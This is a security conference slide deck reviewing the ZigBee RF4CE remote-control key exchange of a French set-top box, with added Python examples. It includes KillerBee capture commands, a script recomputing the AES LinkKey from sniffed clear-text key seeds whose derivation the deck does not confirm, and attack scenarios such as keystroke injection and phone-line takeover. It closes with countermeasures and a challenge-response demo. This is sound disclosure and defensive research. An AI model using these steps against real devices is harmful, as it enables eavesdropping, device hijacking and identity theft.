Slide 1

ZigBee security review of a famous French set-top box
Renaud Lifchitz (renaud.lifchitz@digitalsecurity.fr)
Nuit Du Hack, Paris, July 2nd, 2016

Slide 2

Outline
- Introduction to ZigBee protocol
- ZigBee useful tools
- Study of our target
- Best practices for wireless security

P. 2 ZigBee security review of a famous French set-top box - Digital Security

Slide 3

Speaker's bio
French senior security engineer
Main activities:
- Penetration testing & security audits
- Security research
- Security trainings
Main interests:
- Security of protocols (authentication, cryptography, information leakage, reverse engineering...)
- Number theory (integer factorization, primality testing, elliptic curves...)

Slide 4

About Digital Security
- Company founded in 2015 by a group of experts with the support of Econocom Group
- Provides advanced services in security audit, consulting and support
- Our expertise combines traditional infrastructure and application security with skills oriented to the ecosystem of connected objects
- Created CERT-UBIK, the first European CERT™ specialized in IoT security (OSIDO monitoring service)
- Has a laboratory for addressing technologies, data exchange protocols and specific operating systems
- Diamond sponsor of this event

Slide 5

Introduction to ZigBee protocol

Slide 6

ZigBee
- IEEE 802.15.4-based protocol to create PANs & mesh networks
- Mostly in the 2.4 GHz ISM band in Europe
- Created in 1998, standardized in 2003, revised in 2006
- High-level & low-power communications over 10-100 m
- Supports AES-128-CCM* encryption
- A lot of variants:
  - ZigBee (2004/2006/2007)
  - ZigBee PRO, which defines a stack and additional features (2007/2012)
  - ZigBee 3.0 (in progress)
  - ZigBee IP
  - ZigBee RF4CE
  - ZigBee Green Power

Slide 7

ZigBee RF4CE
- ZigBee RF4CE is an open standard for radio-based remote controls for audio/video consumer electronics
- Commonly used in the USA
- Still quite rare in Europe
- Built on the IEEE 802.15.4 MAC and PHY layers

Slide 8

ZigBee RF4CE advantages over infrared remote controls
- No need for direct line of sight
- Not sensitive to ambient light
- Supports encryption
- Bidirectional
- Higher data rate (multimedia & games usage)

Slide 9

ZigBee useful tools

Slide 10

Hardware tools: TI CC2531 dongle
- 45€ USB stick
- http://www.ti.com/tool/cc2531emk

Slide 11

Hardware tools: Atmel RZUSBstick
- 40€ USB stick
- Supports only sniffing with the default firmware
- http://www.atmel.com/tools/RZUSBSTICK.aspx

Slide 12

Software tools: Texas Instruments Packet Sniffer
Pros:
- Works out-of-the-box with the TI CC2531 dongle
- Windows GUI tool
Cons:
- Doesn't support newer ZigBee variants (e.g. RF4CE)

Slide 13

Software tools: KillerBee framework
- Framework of several Python tools to study ZigBee-based protocols
- The KillerBee firmware allows Atmel RZUSBsticks to sniff & inject packets
- Reflashing the dongle requires additional hardware (a programmer)
- https://github.com/riverloopsec/killerbee

Slide 14

Software tools: Ubiqua Protocol Analyzer
Pros:
- Supports a lot of IEEE 802.15.4 variants
- Windows GUI tool
- Seamless support for encryption
Cons:
- Commercial license

Slide 15

Study of our target

Slide 16

About the target
- Famous French set-top box for Internet and TV access, distributed by a well-known Internet service provider
- Study took place from December 2015, during spare time
- 3 components:
  - Internet box (not directly studied here)
  - TV box
  - Wireless ZigBee-based remote control (RF4CE)

Slide 17

RF4CE key exchange protocol
[Figure: key seed packets combined into the LinkKey (Source: ZigBee RF4CE Specification Version 1.01)]

Slide 18

Key exchange protocol
- The vendor has chosen to distribute the LinkKey across 37 key seeds (not the standard count)
- 37 key seeds of 80 bytes each
- Every key seed is acknowledged in clear text
- The key exchange is literally "whispered": the received signal level drops from -6 dBm for normal keystrokes to -58 dBm during the key exchange!
- This is security by obscurity: the key seeds are sent in clear text, so anyone who captures them can recompute the LinkKey

Slide 19

When will a key exchange occur?
- During a manual pairing
- When the remote control batteries are replaced (the decreasing signal power can be monitored remotely until replacement)
- Some firmware updates require re-pairing
- Forced disassociation by an attacker:
  - Jamming
  - Association flooding

Slide 20

Sniffing the communication between STB and RC
Steps:
1) Capture raw traffic (the channel used is always 15 for this target)
2) Optionally convert it to XML (.opml extension) with Ubiqua for easier manipulation (there is no other good RF4CE protocol dissector)
3) Find "Key Seed" packets and extract their payload
4) Compute the LinkKey using successive XORs
5) Decrypt traffic using AES-128-CCM* and the LinkKey

Slide 21

Computing LinkKey
Capture raw traffic using KillerBee:
$ zbid
Dev      Product String  Serial Number
001:008  KILLERB001      FFFFFFFFFFFF
$ zbstumbler
zbstumbler: Transmitting and receiving on interface '001:008'
New Network: PANID 0x6689  Source 0x7F2A
    Ext PANID: Unknown
    Stack Profile: ZigBee Standard
    Stack Version: ZigBee Prototype
    Channel: 15
$ zbdump -c 15 -w rcdump.pcap
zbdump: listening on '001:008', link-type DLT_IEEE802_15_4, capture size 127 bytes
102 packets captured

Slide 22

Computing LinkKey
Find key seed packets and compute the key:
[Capture screenshot]

Slide 23

Computing LinkKey
Find key seed packets and compute the key:
$ python opml2key.py rcdump.opml
37 key seed packets found
Computed key: 70247b83a1b8d23dd15c595a5b5bfb43
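Steps 3 and 4 of slide 20 in working form, as an added example. This is not the talk's opml2key.py (which is not reproduced in the deck) nor vendor code. It follows the derivation the deck describes ("successive XORs"): all key seeds are XORed together and the 80-byte result is folded into a 16-byte AES-128 key by XORing its five 16-byte blocks. The record layout (one sequence-number byte followed by the 80-byte seed) and the seeds themselves are constructed for the example; a real capture would extract the payload of each Key Seed command from the .pcap or .opml first.

```python
"""Recompute an RF4CE LinkKey from captured key-seed payloads (added example).

Assumed derivation: XOR all seeds, then XOR the five 16-byte blocks of the
80-byte result. Records are (sequence number, seed) and are constructed here.
"""
from functools import reduce
import random

SEED_LEN = 80      # key seed size in the first firmware studied (slide 18)
KEY_LEN = 16       # AES-128 LinkKey
SEED_COUNT = 37    # number of key seeds sent by this target


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("XOR operands must have the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def link_key_from_seeds(seeds) -> bytes:
    """XOR all seeds together, then fold the 80-byte result into 16 bytes."""
    seeds = list(seeds)
    if not seeds:
        raise ValueError("no key seeds")
    if any(len(s) != SEED_LEN for s in seeds):
        raise ValueError(f"every key seed must be {SEED_LEN} bytes long")
    combined = reduce(xor_bytes, seeds)
    blocks = [combined[i:i + KEY_LEN] for i in range(0, SEED_LEN, KEY_LEN)]
    return reduce(xor_bytes, blocks)


def parse_seed_records(records, expected=SEED_COUNT):
    """Split constructed (seq, seed) records; report missing sequence numbers.

    A capture that lost even one seed (slide 31: short frames can be dropped
    at capture time) yields a wrong key, so completeness is checked first.
    """
    by_seq = {}
    for rec in records:
        seq, seed = rec[0], rec[1:]
        if seq in by_seq:
            raise ValueError(f"duplicate key seed {seq}")
        by_seq[seq] = seed
    missing = [n for n in range(expected) if n not in by_seq]
    return by_seq, missing


def recover_key(records, expected=SEED_COUNT) -> bytes:
    """Full pipeline: parse records, refuse an incomplete capture, derive the key."""
    by_seq, missing = parse_seed_records(records, expected)
    if missing:
        raise ValueError(f"incomplete capture, missing key seeds {missing}")
    return link_key_from_seeds(by_seq[n] for n in sorted(by_seq))


def make_sample_records(count=SEED_COUNT, rng_seed=2016):
    """Constructed sample capture: deterministic pseudo-random seeds, not real data."""
    rng = random.Random(rng_seed)
    return [bytes([n]) + bytes(rng.getrandbits(8) for _ in range(SEED_LEN))
            for n in range(count)]


if __name__ == "__main__":
    records = make_sample_records()
    print("LinkKey:", recover_key(records).hex())
    # Dropping one seed is reported instead of silently producing a wrong key.
    try:
        recover_key(records[:12] + records[13:])
    except ValueError as exc:
        print(exc)
```

Because XOR is commutative, seed order does not matter, but every seed does: a single dropped frame gives a key that is uniformly wrong rather than "almost right", which is why the completeness check comes before the derivation. Nothing in the pipeline requires a secret, which is the whole point of slide 18: the only thing protecting the LinkKey is the low transmit power during the exchange.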

Slide 24

Computing LinkKey
Successfully decrypted keystroke packet (Ubiqua): mostly null bytes!

Slide 25

Possible attacks
Using sniffing of the key exchange:
- Sniffing of keystrokes and decryption
- Remote control of the set-top box (key injection)
- All associated attacks
Two kinds of attack scenarios:
- Blind: the victim's TV screen is not visible
- Not blind: the victim's TV screen is visible (for instance through a window), or the attacker captures the TV's leaking electromagnetic emanations (up to 20 meters, depending on the TV monitor)

Slide 26

Attack scenario 1: arbitrary access to set-top box/subscription functions
Requirements: none
Attack type: mostly blind
Impacts:
- DoS (controlled power off/reboots of the TV/set-top box)
- Subscriptions to pay channels
- Pairing of additional remote controls

Slide 27

Attack scenario 2: arbitrary Bluetooth activation and device pairing (mouse, keyboard, headset, ...)
Requirements: connected BT dongle
Attack type: blind or not blind (PIN pairing depends on the BT device capability)
Impacts: keystroke injection, listening to voicemail (through a headset)

Slide 28

Attack scenario 3: arbitrary Internet browsing & downloading
Requirements: none
Attack type: blind
Impacts: identity theft through:
- mail sending and Twitter posting (for configured accounts)
- illegal browsing & downloads (BitTorrent)

Slide 29

Attack scenario 4: arbitrary access to the victim's phone line through DECT pairing
Requirements: none
Attack type: blind (4-digit PIN brute force) or not blind
Impacts: identity theft through:
- Calls and call answers
- Access to voicemail

Slide 30

Attack scenario 5: arbitrary access to the victim's LAN through Wi-Fi (key disclosure)
Requirements: Wi-Fi used
Attack type: not blind
Impacts: identity theft through full Internet access, LAN sniffing, MitM...

Slide 31

Changes in the key exchange
- The key exchange protocol changed during the study (software updates are automatic at boot time)
- Now every key seed is 22 bytes long instead of 80
- The provider moves away from the RF4CE specification
- Still 37 different key seeds, but at a faster pace (some short packets like ACKs can be dropped at capture time)
- How is the 16-byte AES key built from 22-byte key seeds?
- Is the new key exchange more secure? No: there is still no challenge, so it offers the same security level

Slide 32

Conclusion
- Attacks not specific to this target: any ZigBee set-top box might be vulnerable
- Attack not easy due to the low signal level during the key exchange, but possible with:
  - a low-noise amplifier (LNA) for reception
  - and/or a power amplifier for emission
  - and/or a directional antenna (e.g. a 2.4 GHz Wi-Fi antenna)
- ZigBee-based key exchanges are generally vulnerable
- Few RF4CE protocol dissectors are good

Slide 33

Best practices for wireless security

Slide 34

Threats & countermeasures

Threat                              Good countermeasures
----------------------------------  ----------------------------------------------
Passive snooping                    - Secure key exchange (e.g. Diffie-Hellman)
                                    - Encryption
Voluntary or involuntary jamming    - Spread spectrum
                                    - Frequency/channel hopping
Usurpation (e.g. replay)            - Anti-replay mechanisms (cryptographic nonce)
                                    - Authentication using a challenge
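The last row of the table in working form, as an added example that is not from the talk or the vendor: a nonce-based challenge-response between a set-top box and a remote control, with a replayed response and a wrong-key response both rejected. It assumes a 128-bit key already shared by both devices and uses HMAC-SHA256 as the keyed function; both are illustrative choices. Establishing that shared key securely is the separate problem of the first row (key exchange), which the RF4CE seeds of slide 18 do not solve.

```python
"""Challenge-response authentication with single-use nonces (added example).

Assumes a pre-shared 128-bit key and HMAC-SHA256 as the keyed function.
Neither the deck nor the vendor specifies these; they illustrate the
"authentication using a challenge" and "cryptographic nonce" countermeasures.
"""
import hashlib
import hmac
import os

NONCE_LEN = 16


def keyed_response(key: bytes, nonce: bytes) -> bytes:
    """Response to a challenge: keyed MAC over the nonce."""
    return hmac.new(key, nonce, hashlib.sha256).digest()


class SetTopBox:
    """Verifier: issues a fresh nonce per attempt and accepts each nonce once."""

    def __init__(self, key: bytes, rng=os.urandom):
        self._key = key
        self._rng = rng
        self._pending = None

    def challenge(self) -> bytes:
        self._pending = self._rng(NONCE_LEN)
        return self._pending

    def verify(self, response: bytes) -> bool:
        if self._pending is None:
            return False              # no outstanding challenge to answer
        expected = keyed_response(self._key, self._pending)
        self._pending = None          # nonce consumed whether or not it verifies
        return hmac.compare_digest(expected, response)


class RemoteControl:
    """Prover: answers a challenge with the keyed function of the nonce."""

    def __init__(self, key: bytes):
        self._key = key

    def respond(self, nonce: bytes) -> bytes:
        return keyed_response(self._key, nonce)


def authenticate(box: SetTopBox, remote: RemoteControl) -> bool:
    """One complete exchange: challenge from the box, response from the remote."""
    return box.verify(remote.respond(box.challenge()))


def replay(box: SetTopBox, remote: RemoteControl) -> bool:
    """Attacker records a valid response and replays it against a later challenge."""
    nonce = box.challenge()
    captured = remote.respond(nonce)
    assert box.verify(captured)       # the legitimate exchange succeeds
    box.challenge()                   # the box issues a new nonce
    return box.verify(captured)       # replayed response: rejected


def impersonate(box: SetTopBox, wrong_key: bytes) -> bool:
    """Attacker without the key answers the challenge with a guessed key."""
    nonce = box.challenge()
    return box.verify(keyed_response(wrong_key, nonce))


if __name__ == "__main__":
    key = os.urandom(16)
    box, remote = SetTopBox(key), RemoteControl(key)
    print("legitimate exchange accepted:", authenticate(box, remote))
    print("replayed response accepted:", replay(box, remote))
    print("wrong-key response accepted:", impersonate(box, os.urandom(16)))
```

Contrast this with the target: because the RF4CE exchange of slide 18 never challenges the remote, an attacker who has recomputed the LinkKey (or simply replays captured keystroke frames) is indistinguishable from the legitimate remote. A fresh nonce per attempt makes a recorded response worthless, and the constant-time comparison avoids leaking the expected value byte by byte.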

Slide 35

Best practices for wireless protocols
- Use wireless protocols suited to your security needs
- Pairing is usually a critical stage: do it in a controlled environment
- Monitor the network continuously for anomalies
- Don't re-invent the wheel, use well-known security recipes (previous slide): Bluetooth (not BLE) comes close to ideal
- When possible, protect the physical perimeter of use (defence-in-depth philosophy)

Slide 36

Thanks! Questions?
IoT Security Contact: info@digitalsecurity.fr